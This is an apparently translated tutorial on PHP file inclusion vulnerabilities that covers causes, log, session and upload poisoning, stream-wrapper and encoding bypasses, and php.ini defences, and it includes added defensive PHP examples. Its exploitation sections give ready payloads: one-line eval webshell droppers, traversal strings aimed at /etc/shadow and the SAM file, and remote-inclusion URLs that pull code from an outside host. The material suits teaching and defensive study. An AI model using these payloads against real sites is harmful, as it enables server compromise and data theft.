File Inclusion Vulnerabilities: A Summary

I. Definition

When a script implements file-serving functionality without properly validating the incoming file name, it can be made to operate on a file other than the intended one, resulting in unintended file disclosure and even malicious code injection.

II. Common Functions

PHP has four common file-inclusion functions:

       require()

       require_once()

       include()

       include_once()

The main difference between include and require: if an error occurs while include is processing the file, a warning is thrown and the program continues to run normally; if require hits an error, it raises a fatal error and exits the program directly.

include_once() and require_once(): these two functions include a file only once during script execution. When a file might be included more than once, they make sure it is included only once, avoiding function redefinitions, variable reassignments and similar problems.

III. Cause of the vulnerability

Cause

The parameter that a file inclusion function loads is not filtered or strictly defined, so it is controlled by the user; other, malicious files can then be included, leading to unintended code execution.

Sample Code

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

The developer does not strictly filter the $_GET['filename'] parameter and passes it directly into the include function, so an attacker can modify the value of $_GET['filename'] and perform unintended operations.
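As an added example (not code from the original post), here is the hardened counterpart of the sample above. It shows the two defences that actually hold up against the traversal, NUL-byte and stream-wrapper inputs this page goes on to list: an allow-list that maps a token to a known file (so no path comes from the user at all), and, where a dynamic name is unavoidable, a strict shape check followed by realpath() containment. The page directory, file names and request values are constructed for the demo, and PHP 8.0+ is assumed for str_contains()/str_starts_with().

```php
<?php
// Added example (not code from the original post): a hardened replacement for
// the "include($_GET['filename'])" pattern above. Directory and file names are
// constructed for this demo, and the request is simulated so it runs from the CLI.
// Assumes PHP 8.0+ (str_contains / str_starts_with).

declare(strict_types=1);

/**
 * Resolve a user-supplied page name to a file inside $baseDir, or return null.
 *
 * Layers:
 *  1. allow-list mode ($allowList given): the user picks a token, never a path;
 *  2. dynamic mode: the name must be a plain "<word>.php", so NUL bytes, slashes,
 *     backslashes, "..", and stream wrappers (php://, data://, zip://, http://) are
 *     rejected before any filesystem access;
 *  3. realpath() containment: symlinks and any remaining ".." are resolved and the
 *     result must sit below $baseDir.
 */
function resolve_include(string $name, string $baseDir, ?array $allowList = null): ?string
{
    if ($allowList !== null) {
        if (!isset($allowList[$name])) {
            return null;
        }
        $name = $allowList[$name];
    } elseif ($name === '' || strlen($name) > 64
        || str_contains($name, "\0")
        || str_contains($name, '://')
        || !preg_match('/^[A-Za-z0-9_-]+\.php$/', $name)) {
        return null;
    }

    // realpath() returns false for a missing file and resolves ".." and symlinks,
    // so a prefix comparison on the result is authoritative.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    return str_starts_with($path, $base . DIRECTORY_SEPARATOR) ? $path : null;
}

// --- Demo with a throw-away page directory (constructed for this example) ---
$pagesDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_pages';
if (!is_dir($pagesDir)) {
    mkdir($pagesDir, 0700);
}
file_put_contents($pagesDir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo \"  (home page rendered)\\n\";\n");

$allow = ['home' => 'home.php'];

// Request values of the kinds discussed on this page.
$requests = [
    'home',                                                 // allow-listed token
    'home.php',                                             // plain file name
    '../../../../etc/passwd',                               // directory traversal
    'php://filter/convert.base64-encode/resource=home.php', // stream wrapper
    "home.php\0.txt",                                       // NUL-byte truncation
    'http://attacker.example/shell.txt',                    // remote inclusion
];

foreach (['allow-list mode' => $allow, 'dynamic-name mode' => null] as $mode => $list) {
    echo "== $mode ==\n";
    foreach ($requests as $req) {
        $resolved = resolve_include($req, $pagesDir, $list);
        printf("%-8s %s\n", $resolved === null ? 'REJECT' : 'INCLUDE', addcslashes($req, "\0"));
        if ($resolved !== null) {
            include $resolved;
        }
    }
}
```

In allow-list mode only the token home is accepted; in dynamic-name mode only home.php is, and every traversal, wrapper, NUL-byte and remote value is rejected before include() sees it. The realpath() step is what makes the check independent of how the input was encoded: whatever the web server decoded, the filesystem answer is compared against the real base directory.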

IV. Vulnerability types

1. Including Apache log files

Web servers generally store the user's access records in an access log. Based on the contents recorded in the log, a request can be crafted that writes PHP code into the log file, and the file inclusion vulnerability is then used to include the log file and execute that PHP code.

After installation, Apache by default generates two log files: on Windows these are access.log (access log) and error.log (error log), and on Linux access_log and error_log. The access log records each client request and the server's response.

If a non-existent resource is requested, such as http://www.xxxx.com/<?php phpinfo();?>, the request is recorded in the log. The browser transcodes the sensitive characters in the code, but this can be bypassed by adjusting the encoding in Burp Suite, so that <?php phpinfo();?> is written into the Apache log file; the code can then be executed by including the log file. This only works if the storage path of the Apache log file is known, so to be safe, avoid using the default path when installing Apache.

2. Unrestricted local file inclusion

Test code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Test results:

Through the directory traversal vulnerability, the contents of other files on the system can be read:

Common paths of sensitive information:

Windows systems

c:\boot.ini // check the system version
c:\windows\system32\inetsrv\MetaBase.xml // IIS configuration file
c:\windows\repair\sam // stores the password of the initial Windows installation
c:\ProgramFiles\mysql\my.ini // MySQL configuration
c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root password
c:\windows\php.ini // PHP configuration information

Linux/Unix systems

/etc/passwd // account information
/etc/shadow // account password file
/usr/local/app/apache2/conf/httpd.conf // Apache2 default configuration file
/usr/local/app/apache2/conf/extra/httpd-vhost.conf // virtual host configuration
/usr/local/app/php5/lib/php.ini // PHP configuration
/etc/httpd/conf/httpd.conf // Apache configuration file
/etc/my.conf // MySQL configuration file

3. Session file inclusion

The session file can be tried first: look for a controlled variable in the file's content, insert the constructed payload into the file, and finally include it.

Conditions for use:

 ● a controlled variable is found in the session
 ● the session is written to a file, and the storage path is known

1. The session file save path can be seen under session.save_path in phpinfo.

2. Common session storage paths:

● /var/lib/php/sess_PHPSESSID
● /tmp/sess_PHPSESSID
● /tmp/sessions/sess_PHPSESSID
● Session file name format: sess_[phpsessid]; the PHPSESSID is visible in the Cookie field of the request.

Example:

<?php
session_start();
$ctfs = $_GET['ctfs'];
$_SESSION["username"] = $ctfs;
?>

Vulnerability analysis

PHP stores the value of the GET variable ctfs in the session.

After accessing http://www.ctfs-wiki/session.php?ctfs=ctfs, the value is stored in a session file under the /var/lib/php/session directory.

The session file name is sess_ + sessionid; the sessionid can be obtained from the browser's developer tools.

So the session file is named sess_akp79gfiedh13ho11i6f3sm6s6.

This file really exists in the server's /var/lib/php/session directory, and its content is:

[root@c21336db44d2 session]# cat sess_akp79gfiedh13ho11i6f3sm6s6
username|s:4:"ctfs";


Exploitation

From the analysis above, the value passed in ctfs is stored in the session file. If a local file inclusion vulnerability exists, malicious code can be written into the session file through ctfs and then executed through the file inclusion vulnerability to get a shell.

After accessing http://www.ctfs-wiki/session.php?ctfs=<?php phpinfo();?>, the session value is stored under the /var/lib/php/session directory.

[root@6da845537b27 session]# cat sess_83317220159fc31cd7023422f64bea1a
username|s:18:"<?php phpinfo();?>";

An attacker can learn the session storage location through phpinfo() information disclosure or by guessing, obtain the file name from the browser's developer tools, and then have the malicious code parsed through the file inclusion vulnerability to get a shell.


4. Including /proc/self/environ

/proc/self/environ holds the User-Agent header. If PHP code is inserted into the User-Agent, the code is written into environ, and it can then be included.

Conditions for use:

● PHP runs in CGI mode, so that environ retains the UA header.
● The location of the environ file is known, and the file is readable.
5. Unrestricted remote file inclusion

Test code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Through the remote file inclusion vulnerability, including php.txt gets it parsed: http://www.ctfs-wiki.com/FI/FI.php?filename=http://192.168.91.133/FI/php.txt

6. Including temporary files

Uploading a file in PHP creates a temporary file: on Linux in the /tmp directory, on Windows in the c:\windows\temp directory. Before the temporary file is deleted, a race can be used to include it.

Since inclusion requires knowing the file name, one approach is brute-force guessing: the random function used on Linux is flawed, and on Windows there are only 65535 possible file names, so this method is feasible.

Another approach uses the PHP Variables section of a phpinfo page, which directly reveals the storage path and temporary file name of the uploaded file, so it can be included directly. See "LFI With PHPInfo Assistance" for this method.
7. Including uploaded files

Many websites provide file upload functionality, such as uploading avatars or documents; in that case an image containing a one-line webshell can be uploaded and then included.

The image webshell is made as follows:

    Enter the directory containing 1.jpg and 2.php, then run:

        copy 1.jpg/b+2.php 3.jpg (merges the image 1.jpg and the file 2.php containing PHP code into the image webshell 3.jpg)

Suppose the image webshell has been uploaded to the server at the path /upload/201811.jpg.
The image's code is:

       <?fputs(fopen("shell.php","w"),"<?php eval($_POST['pass']);?>")?>

Then access the URL http://www.xxxx.com/index.php?page=./upload/201811.jpg, and shell.php is generated in the directory where index.php resides.

V. Bypass methods

1. Bypassing a fixed prefix
(1) Directory traversal

Using ../../ to move up to the parent directory is called directory traversal (path traversal). For example ?file=../../phpinfo/phpinfo.php
Test code:

<?php
     error_reporting(0);
     $file = $_GET["file"];
     // prefix
     include "/var/www/html/".$file;

     highlight_file(__FILE__);
?>

Now suppose the file flag.txt exists in /var/log. With ../ the directory can be traversed; for example, we try to access:

include.php?file=../../log/flag.txt

The path actually concatenated on the server side is /var/www/html/../../log/flag.txt, i.e. /var/log/flag.txt, so the inclusion succeeds.
(2) Encoding bypass

The server side often filters sequences such as ../; some encodings can be used to bypass this.
1. URL encoding

../
%2e%2e%2f
..%2f
%2e%2e/

..\
%2e%2e%5c
..%5c
%2e%2e\

2. Double encoding

../
%252e%252e%252f
..\
%252e%252e%255c

3. Container/server-specific encodings

../

..%c0%af
    Note: see "Why does Directory traversal attack %C0%AF work?"

%c0%ae%c0%ae/
       Note: Java parses "%c0%ae" as "\uC0AE", which is finally converted to the ASCII character "."

..\
..%c1%9c
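As an added example (not code from the original post), the following PHP script shows the defender's side of this list: it scans Apache access-log lines for the traversal, NUL-byte and wrapper variants above, peeling off up to three layers of percent-encoding so that double-encoded and overlong-UTF-8 forms are caught as well as a plain ../. The log lines, addresses and parameter names are constructed for the demo; a real deployment would tune the patterns against its own false positives.

```php
<?php
// Added example (not from the original post): flag file-inclusion and traversal
// attempts in Apache access-log lines, including the URL-encoded, double-encoded
// and overlong-UTF-8 variants listed above. Log lines below are constructed.

declare(strict_types=1);

/** Peel up to $layers of percent-encoding; index 0 is the raw string. */
function decode_layers(string $s, int $layers = 3): array
{
    $out = [$s];
    for ($i = 0; $i < $layers; $i++) {
        $next = urldecode($out[$i]);
        if ($next === $out[$i]) {
            break; // nothing left to decode
        }
        $out[] = $next;
    }
    return $out;
}

/** Return a short reason if the request target looks like a file-inclusion probe, else null. */
function classify_request(string $target): ?string
{
    // Byte sequences an application (or a lenient server) may turn into "../" or "..\":
    $traversal = [
        "../"              => 'dot-dot-slash',
        "..\\"             => 'dot-dot-backslash',
        "..\xc0\xaf"       => 'overlong UTF-8 slash (%c0%af)',
        "\xc0\xae\xc0\xae" => 'overlong UTF-8 dots (%c0%ae)',
        "..\xc1\x9c"       => 'overlong UTF-8 backslash (%c1%9c)',
    ];
    foreach (decode_layers($target) as $depth => $layer) {
        $hay = strtolower($layer);
        foreach ($traversal as $needle => $why) {
            if (str_contains($hay, $needle)) {
                return "$why (decode depth $depth)";
            }
        }
        if (str_contains($hay, "\0")) {
            return "NUL byte (decode depth $depth)";
        }
        // A query value that starts with a stream wrapper or remote URL scheme.
        if (preg_match('/[?&][^=&]*=(php|data|zip|phar|file|https?|ftp):/', $hay)) {
            return "stream wrapper or remote URL in parameter (decode depth $depth)";
        }
    }
    return null;
}

/** Parse an Apache combined/common log line into ip, method, target and status, or null. */
function parse_log_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'method' => $m[2], 'target' => $m[3], 'status' => (int) $m[4]];
}

/** Scan many lines; returns one row per suspicious request. */
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        $req = parse_log_line($line);
        if ($req === null) {
            continue;
        }
        $why = classify_request($req['target']);
        if ($why !== null) {
            $hits[] = ['line' => $n + 1, 'ip' => $req['ip'], 'status' => $req['status'],
                       'reason' => $why, 'target' => $req['target']];
        }
    }
    return $hits;
}

// Constructed sample lines (addresses and paths are invented for this example).
$sample = [
    '10.0.0.5 - - [10/Jan/2020:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jan/2020:10:00:02 +0000] "GET /index.php?page=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1873 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Jan/2020:10:00:03 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Jan/2020:10:00:04 +0000] "GET /index.php?page=..%c0%af..%c0%afetc/passwd HTTP/1.1" 200 1873 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Jan/2020:10:00:05 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 9000 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Jan/2020:10:00:06 +0000] "GET /index.php?page=test.txt%00.html HTTP/1.1" 200 44 "-" "curl/7.68"',
];

foreach (scan_log($sample) as $hit) {
    printf("line %d  %s  HTTP %d  %s\n    %s\n",
        $hit['line'], $hit['ip'], $hit['status'], $hit['reason'], $hit['target']);
}
```

The first sample line is a normal request and produces no row; the other five are reported with the decode depth at which the pattern appeared, which is itself useful triage data: a hit at depth 2 means the client sent a double-encoded value, something no browser does on its own. An HTTP 200 next to a traversal hit is the line worth investigating first.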


2. Bypassing a fixed suffix

The test code for suffix bypass is as follows; all suffix bypass methods below use this code:

<?php
     error_reporting(0);
     $file = $_GET["file"];
     // suffix
     include $file.".txt";

     highlight_file(__FILE__);
?>

(1) Using the URL

In a remote file inclusion (RFI) vulnerability, the query or fragment can be used to bypass the suffix restriction.
See this article: URI's fragment

Full URL format:

      protocol :// hostname[:port] / path / [;parameters][?query]#fragment

query (?)

[request parameter]      ?file=http://localhost:8081/phpinfo.php?
[after concatenation]    ?file=http://localhost:8081/phpinfo.php?.txt

Example: (assume flag2.txt exists in the root directory)

fragment (#)

[request parameter]      ?file=http://localhost:8081/phpinfo.php%23
[after concatenation]    ?file=http://localhost:8081/phpinfo.php#.txt

Example: (assume flag2.txt exists in the root directory)

(2) Using protocols (stream wrappers)

PHP has many built-in URL-style wrappers that can be used with filesystem functions such as fopen(), copy(), file_exists() and filesize(). Besides these built-in wrappers, custom wrappers can be registered with stream_wrapper_register().

     php:// input/output streams

PHP provides a number of miscellaneous input/output (I/O) streams that give access to PHP's own input and output streams, the standard input, output and error descriptors, in-memory and disk-backed temporary file streams, and filters that can operate on other file resources being read or written.

     php://filter (reading local disk files)

A meta-wrapper designed to apply filters when a stream is opened; it reads and writes local disk files.

Usage: ?filename=php://filter/convert.base64-encode/resource=xxx.php, which is the same as ?filename=php://filter/read=convert.base64-encode/resource=xxx.php.

Condition: read only; requires allow_url_fopen to be enabled, does not require allow_url_include.

Test code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

       php://input

A read-only stream that gives access to the raw request data, i.e. the raw, unparsed POST body can be read directly. php://input does not work when enctype="multipart/form-data".

Usage: ?file=php://input, with the data sent via POST.

        php://input (reading POST data)

Whenever file_get_contents() is encountered, think of using php://input to bypass, because PHP pseudo-protocols can also use the HTTP protocol, i.e. data can be sent via POST; the function's specific meaning is covered in the next item.

Test code:

<?php
    echo file_get_contents("php://input");
?>

       php://input (writing a webshell)

Test code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Condition: allow_url_fopen and allow_url_include must both be enabled in the PHP configuration file (PHP < 5.3.0). Arbitrary code execution is then possible, which here can be understood as remote file inclusion (RFI): the PHP code is POSTed and executed.

If the POSTed data is PHP code that writes a one-line webshell, a webshell is written in the current directory.

<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?> 

If allow_url_include is not enabled, an error is reported.

        php://input (command execution)

Test code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

Condition: allow_url_fopen and allow_url_include must both be enabled in the PHP configuration file (PHP < 5.3.0). Arbitrary code execution is then possible, which here can be understood as remote file inclusion (RFI): the PHP code is POSTed and executed.

If allow_url_include is not enabled, an error is reported.

        file:// pseudo-protocol (reading file contents)

The file protocol gives access to the local filesystem and reads the contents of files.

Test code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

         data:// pseudo-protocol

A data stream wrapper. Like php://, it uses the stream concept, redirecting the file stream that include would read to an input stream the user controls. Put simply, the file inclusion includes your input stream, and the payload you supply achieves the goal: data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4

data:// (reading files)

Similar to php://input; use it when file_get_contents() is encountered:

<?php
// prints "I love PHP"
echo file_get_contents('data://text/plain;base64,SSBsb3ZlIFBIUAo=');
?>

Note: code such as <?php phpinfo(); has no closing ?> at the end.

If allow_url_include=On in php.ini (PHP < 5.3.0), arbitrary code execution is possible; likewise this can be understood as remote file inclusion (RFI). Test code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

        phar:// pseudo-protocol

This wrapper is PHP's archive-extraction facility: regardless of the file extension, the file is treated as an archive and extracted.

Usage: ?file=phar://archive/inner-file, e.g. phar://xxx.png/shell.php. Note: PHP >= 5.3.0; the archive must be zip-compressed (rar does not work); after compressing the webshell file, renaming it to any other format still works. Steps: write a one-line webshell file shell.php, compress it with zip into shell.zip, then change the extension to png or another format.

Test code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>

        zip:// pseudo-protocol

The zip pseudo-protocol is similar to phar, but the usage differs.

Usage: ?file=zip://[absolute path of the archive]#[file name inside the archive], e.g. zip://xxx.png#shell.php.

Condition: PHP >= 5.3.0; note that on Windows, testing requires 5.3.0 < PHP < 5.4. The # must be encoded as %23 in the browser, otherwise the browser will not transmit the special character by default.

Test code:

<?php
    $filename = $_GET['filename'];
    include($filename);
?>


3. Length truncation

Conditions for use:

PHP version < 5.2.8

Principle:

On Windows the maximum directory length is 256 bytes; anything beyond it is discarded.
On Linux the maximum directory length is 4096 bytes; anything beyond it is discarded.

Test code:

<?php
    $filename = $_GET['filename'];
    include($filename . ".html");
?>

EXP:

  http://www.ctfs-wiki.com/FI/FI.php

 ?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././
./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././


     Dot truncation

Condition: Windows OS; the dot sequence must be longer than 256.

Test code:

<?php
    $filename = $_GET['filename'];
    include($filename . ".html");
?>

EXP:

http://www.ctfs-wiki.com/FI/FI.php
?filename=test.txt........................................................................................................................................................................
..........................................................................................................................................................................................
..........................................................................................................................................................................................
..........................................................................................................................................................................................
..........................................................................................................................................................................................
..........................................................................................................................................................................................
.......................................................................................................................


4. Bypassing restricted remote file inclusion

Test code:

<?php include($_GET['filename'] . ".html"); ?>

The code appends an .html suffix, so the remotely included file name also gets an .html suffix.

(1) Question mark bypass

 http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt?

(2) # bypass

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23

What else can bypass it? Running the request through Burp shows that a space also works:

(3) Space bypass

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%20

VI. Defending against file inclusion vulnerabilities

    • Apply least privilege to allow_url_include and allow_url_fopen (disable them unless they are needed)

    • Set open_basedir (open_basedir restricts the files PHP can open to the specified directory tree)

    • Restrict includable files with a whitelist, or strictly filter the characters . / \
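As an added example (not code from the original post), this read-only PHP script audits the three php.ini controls just listed on the host it runs on and reports what is still open. The recommended values are the ones this page gives; the web-root path in the comment is a placeholder to be adjusted per deployment. Run it once from the CLI and once through the web SAPI, because the two can load different ini values.

```php
<?php
// Added example (not from the original post): a read-only audit of the php.ini
// controls listed above. Run it as "php audit.php" on the host, and again through
// the web SAPI, since CLI and web ini values can differ. It changes nothing; the
// recommended values are this page's, and the web-root path is an assumption.

declare(strict_types=1);

/** ini_get() reports Off as "" or "0" and On as "1"; normalise to bool. */
function ini_bool(string $key): bool
{
    return filter_var((string) ini_get($key), FILTER_VALIDATE_BOOLEAN);
}

/**
 * Returns ['findings' => [[setting, value, advice], ...], 'info' => [...]].
 * An empty 'findings' list means the three controls are in place.
 */
function audit_inclusion_hardening(): array
{
    $findings = [];
    $info = [];

    if (ini_bool('allow_url_include')) {
        $findings[] = ['allow_url_include', 'On',
            'include()/require() accept http://, php://input and data:// sources; set allow_url_include = Off'];
    }
    if (ini_bool('allow_url_fopen')) {
        $findings[] = ['allow_url_fopen', 'On',
            'file functions accept remote URLs; set allow_url_fopen = Off unless the application needs it'];
    }

    $openBase = (string) ini_get('open_basedir');
    if ($openBase === '') {
        $findings[] = ['open_basedir', '(unset)',
            'PHP may open any readable file (/etc/passwd, log and session files); confine it to the web root tree'];
    } else {
        $info[] = "open_basedir = $openBase";
    }

    // Session files are an inclusion target (section IV.3 above): record where they live so a
    // reviewer can check that directory against open_basedir and the include allow-list.
    $sessPath = (string) ini_get('session.save_path');
    $info[] = 'session.save_path = ' . ($sessPath === '' ? sys_get_temp_dir() . ' (default)' : $sessPath);

    return ['findings' => $findings, 'info' => $info];
}

// Recommended php.ini lines (all three are PHP_INI_SYSTEM: ini_set() cannot change them at runtime):
//   allow_url_fopen   = Off
//   allow_url_include = Off
//   open_basedir      = /var/www/html/:/tmp/   <- web root is a placeholder; /tmp is listed
//                       because session.save_path usually has to stay inside open_basedir,
//                       which is exactly why include names must still be allow-listed.
$result = audit_inclusion_hardening();
foreach ($result['findings'] as [$setting, $value, $advice]) {
    printf("FAIL %-18s %-10s %s\n", $setting, $value, $advice);
}
foreach ($result['info'] as $line) {
    echo "INFO $line\n";
}
echo $result['findings'] === [] ? "OK: URL wrappers disabled and open_basedir set.\n" : '';
```

The script deliberately separates findings (a control is missing) from information (where session files live), because open_basedir alone does not close the session-file and log-file vectors from section IV: those files sit in directories PHP legitimately needs, so the allow-list on include names remains the primary control.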

 

VII. References

    https://blog.csdn.net/qq_42181428/article/details/87090539      Author: LetheSec

    https://www.freebuf.com/articles/web/182280.html      Author: Shandong Anyun, from FreeBuf.COM

Source: www.cnblogs.com/zs0618/p/12193718.html